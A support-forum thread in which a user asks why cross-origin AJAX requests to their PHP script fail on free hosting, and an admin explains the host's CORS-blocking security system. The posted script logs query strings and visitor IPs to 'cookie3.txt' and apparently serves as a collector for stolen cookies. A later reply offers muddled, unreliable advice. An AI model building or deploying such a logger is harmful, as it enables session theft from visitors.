This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support

moooooon · July 16, 2019, 6:03am

why i keep getting this message while trying to send a post request to my php file using ajax ?
the file is used to save query strings into a file
<?php

$text = $_SERVER['QUERY_STRING'];
$date = gmdate ("d-n-Y");
$time = gmdate ("H:i:s");
$ip = $_SERVER['REMOTE_ADDR'];
$message .= "----------\n";
$message .= "content: ".$text."\n";
$message .= "IP: ".$ip."\n";
$message .= "Log : $time / $date \n";
$rnessage = "$message\n";
$file = fopen("cookie3.txt","ab");
fwrite($file,$message);
fclose($file);
?>

is there any fix to this ?

Ergastolator1 · July 16, 2019, 10:21am

https://infinityfree.net/support/javascript-error-using-api-or-mobile-android-app/

moooooon · July 17, 2019, 5:54am

@Ergastolator1 so that’s a no to xmlhttp get request ?

Ergastolator1 · July 17, 2019, 6:09am

Yes, because this hosting is intended as a website hosting, not an API/data storage hosting.

Admin · July 17, 2019, 7:53am

Just to clarify the article: using AJAX should work fine, but only if the page you’re launching the AJAX request from is on the same domain as the URL you’re sending the request to. Doing AJAX requests from other websites is not possible.

So if you have the script at website example.com/log.php, you can do AJAX from example.com or example.com/forum/topic/123.php, but not from example.net.

moooooon · July 18, 2019, 9:37am

@Admin why isn’t
Access-Control-Allow-Origin header can be added to the php file ?

Ergastolator1 · July 18, 2019, 9:46am

Because of the security system that is present on all websites and cannot be deleted.

Admin · July 18, 2019, 11:28am

Oh, you can send that header from your website. But the security system will block CORS requests before they hit your website, so the headers will only be sent to clients which have a valid access cookie.

So you can send CORS headers, but doing so will not let you do CORS.

moooooon · July 18, 2019, 6:29pm

why you making it not so flexible!

Admin · July 20, 2019, 11:13am

For starters, this is a useful security feature for websites. It helps to protect your website against malicious bots and attacks. And before you say “but my website is secure and I don’t need this system”, know that many people will disable any security measure without proper consideration because it inconveniences them, and then it’s our servers getting overloaded when the website inevitably gets attacked, and we’re getting asked to help fix it (or even get blamed for it) when that happens.

Additionally, we provide a website hosting service for hosting websites. We don’t want people to use our service for file storage, database hosting, API hosting and so on. This system helps to enforce these rules.

monkeyboz · July 30, 2019, 7:40pm

The only way I can see that you can fix the no-javascript issue is to check if the browser has javascript, this appears to be the only way to complete a server connection.

The main issue that I am seeing about ajax calls and specific built in php calls, is that there is a major issue with security and the way in which people have been using the various pre-built solutions (github.com has created a large amount of code that is both insecure and vunerable to misuse) the main answer is to resolve the situation with test answers that will result in the same no-java response and then trickle down the list of requests to find the offending code.

system · September 28, 2019, 7:40pm

This topic was automatically closed 60 days after the last reply. New replies are no longer allowed.